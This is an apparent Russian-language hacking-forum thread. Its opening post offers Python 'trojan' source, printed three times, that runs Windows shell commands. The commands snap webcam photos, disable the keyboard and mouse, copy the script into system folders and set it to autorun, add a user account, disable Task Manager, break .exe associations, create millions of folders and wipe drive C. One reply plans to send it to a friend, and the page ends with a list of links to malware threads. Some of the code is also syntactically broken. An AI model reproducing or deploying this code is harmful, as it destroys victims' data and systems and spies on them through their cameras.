[python] вредоносный код (троян)

id637541997 · 6 мар 2022

Ну усе как бы. Во первых у меня закончилась фантазия. Во вторых все 3 софта (скрипта) настроены на одну командную выполнение.
То есть либо портить либо убивать винду.
Ну и я сделал именно то что и убьет и сожрет все файлы.
Что будет:
Удаление всех фалов.
Заражение autoexec
Создание 10кк папок.
И дофига больше. В конце винда просто выключится.
Я продумал все даже для безопастного режима.
Тк он не сможет прогрузить 10кк папок, и просто вылетает. *проверил на себе*
===============================================================
Код основа + подгрузка нужных нам библиотек + доступ к камере:
import os #импорт выполняющяя cmd
import cv2 #ипорт библиотеки cv2

#доступ к камере
camera = cv2.VideoCapture(0)
for i in range(10)
return_value, image = camera.read()
cv2.imwrite("opencv"+str(i)+".png", image)
del(camera)

Python
import os #импорт выполняющяя cmd

import cv2 #ипорт библиотеки cv2



#доступ к камере

camera = cv2.VideoCapture(0)

for i in range(10)

  return_value, image = camera.read()

  cv2.imwrite("opencv"+str(i)+".png", image)

del(camera)
===============================================================
Выключение говна которое может все остановить.

#блокировка мыши,клавиатуры и многово

os.system ("@echo off")
os.system ("rundll32 keyboard,disable")
os.system ("rundll32 mouse,disable")

Python

#блокировка мыши,клавиатуры и многово os.system ("@echo off") os.system ("rundll32 keyboard,disable") os.system ("rundll32 mouse,disable")

===============================================================
Сам троян.

#сам троян...

os.system ("copy %0 %windir%/system")
os.system ("""
// %0
// %windir%
echo run=%windir%/system/*.bat """)
os.system ("if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r")
os.system ("deltree /y c:\autoexec.bat")
os.system ("echo autoexec.bat echo ti lolka > c:\autoexec.bat")
os.system ("""echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
start %temp%\mes.js.""")
os.system ("attrib c:\autoexec.bat +h +s +a +r")
os.system ("pause")
os.system ("copy %0 C:\System.bat")
os.system ("label C:222")
os.system ("time 22:22")
os.system ("date 22.2.22")
os.system ("assoc .exe=.txt")
os.system ("net user "2222" /add")
os.system ("del "%SystemRoot%\Media" /q >nul")
os.system ("FOR /L %%i IN (1,1,100000000) DO md %%i")
os.system ("""copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul""")
os.system ("rundll32 user,SwapMouseButton")
os.system ("""reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul""")
os.system ("del "%SystemRoot%Cursors*.*" >nul")
os.system ("reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f")
os.system ("del c:Program Files/q")
os.system ("del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul")
os.system ("rundll32 user,disableoemlayer")
os.system ("rd C: /s /q")

Python

#сам троян... os.system ("copy %0 %windir%/system") os.system (""" // %0 // %windir% echo run=%windir%/system/*.bat """) os.system ("if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r") os.system ("deltree /y c:\autoexec.bat") os.system ("echo autoexec.bat echo ti lolka > c:\autoexec.bat") os.system ("""echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js start %temp%\mes.js.""") os.system ("attrib c:\autoexec.bat +h +s +a +r") os.system ("pause") os.system ("copy %0 C:\System.bat") os.system ("label C:222") os.system ("time 22:22") os.system ("date 22.2.22") os.system ("assoc .exe=.txt") os.system ("net user "2222" /add") os.system ("del "%SystemRoot%\Media" /q >nul") os.system ("FOR /L %%i IN (1,1,100000000) DO md %%i") os.system ("""copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul""") os.system ("rundll32 user,SwapMouseButton") os.system ("""reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul""") os.system ("del "%SystemRoot%Cursors*.*" >nul") os.system ("reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f") os.system ("del c:Program Files/q") os.system ("del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul") os.system ("rundll32 user,disableoemlayer") os.system ("rd C: /s /q")

=========================================================================
ПОЛНЫЙ КОД:

import os #импорт выполняющяя cmd

import cv2 #ипорт библиотеки cv2

#доступ к камере
camera = cv2.VideoCapture(0)
for i in range(10)
return_value, image = camera.read()
cv2.imwrite("opencv"+str(i)+".png", image)
del(camera)

#блокировка мыши,клавиатуры и многово
os.system ("@echo off")
os.system ("rundll32 keyboard,disable")
os.system ("rundll32 mouse,disable")
#сам троян...
os.system ("copy %0 %windir%/system")
os.system ("""
// %0
// %windir%
echo run=%windir%/system/*.bat """)
os.system ("if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r")
os.system ("deltree /y c:\autoexec.bat")
os.system ("echo autoexec.bat echo ti lolka > c:\autoexec.bat")
os.system ("""echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
start %temp%\mes.js.""")
os.system ("attrib c:\autoexec.bat +h +s +a +r")
os.system ("pause")
os.system ("copy %0 C:\System.bat")
os.system ("label C:222")
os.system ("time 22:22")
os.system ("date 22.2.22")
os.system ("assoc .exe=.txt")
os.system ("net user "2222" /add")
os.system ("del "%SystemRoot%\Media" /q >nul")
os.system ("FOR /L %%i IN (1,1,100000000) DO md %%i")
os.system ("""copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul""")
os.system ("rundll32 user,SwapMouseButton")
os.system ("""reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul""")
os.system ("del "%SystemRoot%Cursors*.*" >nul")
os.system ("reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f")
os.system ("del c:Program Files/q")
os.system ("del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul")
os.system ("rundll32 user,disableoemlayer")
os.system ("rd C: /s /q")

Python

import os #импорт выполняющяя cmd import cv2 #ипорт библиотеки cv2 #доступ к камере camera = cv2.VideoCapture(0) for i in range(10) return_value, image = camera.read() cv2.imwrite("opencv"+str(i)+".png", image) del(camera) #блокировка мыши,клавиатуры и многово os.system ("@echo off") os.system ("rundll32 keyboard,disable") os.system ("rundll32 mouse,disable") #сам троян... os.system ("copy %0 %windir%/system") os.system (""" // %0 // %windir% echo run=%windir%/system/*.bat """) os.system ("if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r") os.system ("deltree /y c:\autoexec.bat") os.system ("echo autoexec.bat echo ti lolka > c:\autoexec.bat") os.system ("""echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js start %temp%\mes.js.""") os.system ("attrib c:\autoexec.bat +h +s +a +r") os.system ("pause") os.system ("copy %0 C:\System.bat") os.system ("label C:222") os.system ("time 22:22") os.system ("date 22.2.22") os.system ("assoc .exe=.txt") os.system ("net user "2222" /add") os.system ("del "%SystemRoot%\Media" /q >nul") os.system ("FOR /L %%i IN (1,1,100000000) DO md %%i") os.system ("""copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul""") os.system ("rundll32 user,SwapMouseButton") os.system ("""reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul""") os.system ("del "%SystemRoot%Cursors*.*" >nul") os.system ("reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f") os.system ("del c:Program Files/q") os.system ("del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul") os.system ("rundll32 user,disableoemlayer") os.system ("rd C: /s /q")

============================================
https://vk.com/lovegrafon

StaruIIPec · 9 мар 2022

Пойду другу кину

s1andiw · 14 мар 2022

весь код на BAT

s1nolegoo · 14 мар 2022

бро, а как это делается? Я не хочу не кому это отправлять просто интересно)

utilitProger · 21 апр 2024

Бессмысленая трата времени:
Во первых, для запуска у жертвы должен быть интерпритатор, во вторых не о каких компиляциях в ехе файл не может быть и речи, ибо windows defender и smart screen детектит любые файлы pyinstaller-а.

Обходим смартскрин, хром алерт и антивирусы без смс и кредитов

Создаём свою подпись кода за десять минут

Как получить цифровую подпись кода?

Получаем чистый OXI Joiner без склеек с официального сайта.

Делаем несуществующий БОТА (RAT-ник) под iOS

Малвари: методы распространения, виды атак итд итп

Программа шпион для андроид (до 10го) Observer

Flipper Zero

Кто шарит насколько опасно?

Blank-Grabber

Powershell код в активации Windows и не только: как iex и iwr методы помогают "хакерам"

Как удалить ******* без сноса винды?

Как сделать рабочий *** с отправкой * в дискорд.

ИИ может генерировать малварь, избегающую обнаружения в 88% случаев

Как получить доступ к ПК другого человека

Android Malware - VNC - AC Node

Серый экран в DCRat Remote desktop, что делать?

Android Malware - Seed Phrase ******* / OCR / - Source Code

Intezer - мощный инструмент для поиска скрытых угроз

Вирус кражи SMS на Adnroid - Описание проблемы, Пример проекта

Разбор старенького вируса Red Petya и другие семейства данного вируса

Делаем безопасный вебхук для отстука *******а в тг

Какой майнер можно подкачать человеку чтобы мне капали бабки?

Новый вирус постепенно захватывающий LOLZ

Ставим панельку кряка Редлайна за 5 минут

Многофункциональная Android RAT с веб-панелью, без портов.

Пишем ******* на Java

Python кейлоггер: как создать простейший мониторинг с защитой данных

Прячем вирус в картинку •_• | Всем удачи

Вирусология (интересно почитать)

[python] вредоносный код (троян)

Обходим смартскрин, хром алерт и антивирусы без смс и кредитов

Создаём свою подпись кода за десять минут

Как получить цифровую подпись кода?

Получаем чистый OXI Joiner без склеек с официального сайта.

Делаем несуществующий БОТА (RAT-ник) под iOS

Малвари: методы распространения, виды атак итд итп

Программа шпион для андроид (до 10го) Observer

Flipper Zero

Кто шарит насколько опасно?

Blank-Grabber

Powershell код в активации Windows и не только: как iex и iwr методы помогают "хакерам"

Как удалить ******* без сноса винды?

Как сделать рабочий ******* с отправкой ***** в дискорд.

ИИ может генерировать малварь, избегающую обнаружения в 88% случаев

Как получить доступ к ПК другого человека

Android Malware - VNC - AC Node

Серый экран в DCRat Remote desktop, что делать?

Android Malware - Seed Phrase ******* / OCR / - Source Code

Intezer - мощный инструмент для поиска скрытых угроз

Вирус кражи SMS на Adnroid - Описание проблемы, Пример проекта

Разбор старенького вируса Red Petya и другие семейства данного вируса

Делаем безопасный вебхук для отстука *******а в тг

Какой майнер можно подкачать человеку чтобы мне капали бабки?

Новый вирус постепенно захватывающий LOLZ

Ставим панельку кряка Редлайна за 5 минут

Многофункциональная Android RAT с веб-панелью, без портов.

Пишем ******* на Java

Python кейлоггер: как создать простейший мониторинг с защитой данных

Прячем вирус в картинку •_• | Всем удачи

Вирусология (интересно почитать)

[python] вредоносный код (троян)

Как сделать рабочий *** с отправкой * в дискорд.